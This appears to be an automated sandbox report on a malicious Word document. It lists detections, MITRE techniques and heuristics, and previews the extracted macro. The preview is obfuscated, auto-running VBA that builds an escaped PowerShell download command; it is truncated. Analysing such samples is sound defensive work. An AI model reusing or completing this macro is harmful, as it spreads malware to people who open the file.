MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro attempts to construct and execute a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665587-0' further supports this downloader behavior. The AutoOpen macro indicates it will execute automatically upon opening.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6665587-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6665587-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44656 bytes |
SHA-256: 40b0b07bc7da0e2c7904f9b8f2b691660e7f2338a51777de888dd99ad49c9558 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HMQYWlKi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lHjrUoaS" Function YLRWtFl() On Error Resume Next IsArray CDate(OBqQBV - vwBoSo) VKnsP = jNUCF - GzIwdK * uILnN + iVkjl IsArray Sqr(NijkS) VarType LCase(22305 * sXaAn / GIakYk / zFPihb) JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + " s^E" + "^t " + " ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l" VarType Log(4) jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A" VKnsP = MZsJI + hSYLb aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^" VarType hKLqwO - zVRCR / 25307 * oMqtj VarType Tan(bpTbNX) VarType Int(AEfpiw) IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^" VKnsP = Oct(82734 / 19718) VKnsP = 57875 - owrmk VarType Sqr(moizDq) VarType CDec(3266) IsArray Hex(7028) iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A" VKnsP = CDec(uLVMB) kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^" VarType Str(59989 * lXYtC + 95065 + pTMscI) IsArray Hex(3) VarType 4111 / QQIpa VKnsP = Str(kvXWT) VarType Second(nSItk) KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A" VarType MiPYu + VLiAr - wfbIR - YqwEKY IsArray uXWTX + nCjDad + 65604 * RqpSZX MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+" VarType TimeValue(253183858) IsArray CBool(558) IsArray Second(jdULI / VLrEwj) fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^" YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF VKnsP = CDate(14519 / qWqzp / JojZdU * 68430) VarType 50642 / 72586 VarType 85356 / PhBjzq End Function Function pzijAUz() On Error Resume Next IsArray Oct(94) rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^" VKnsP = CDbl(9) VarType Sqr(ikmcLT) IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?" IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan) VarType cJssD + 45380 - csnsn + lCAOS IsArray Oct(hdLhCc / DtfdYk) PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A" VKnsP = KUCZY + UdBTmq VarType QONkT + jcmQE LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^" VKnsP = paHITz - huimu / 51839 - DrQih VKnsP = Str(1) IsArray 39495 + BzhLv VarType Hex(2975) VarType Oct(pXfIAp) tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw" VKnsP = Month(VUiYJ) IsArray Month(18492 / dUjKf + aUcUos - IOwUQ) wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^" VarType nWZMSR * wotiGO jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v" VKnsP = CDate(1) GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?" VarType Log(FBwKm) IsArray CDec(XEvGWY) VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz IsArray Log(zXobJ) FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?" IsArray CStr(89) VarType Int(kAYGj) VarType 28348 / MRoZpu / 77 + EmHDj GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^" pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB VKnsP = TypeName(HDalfY) IsArray Fix(3300) VKnsP = CDbl(wUDJ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.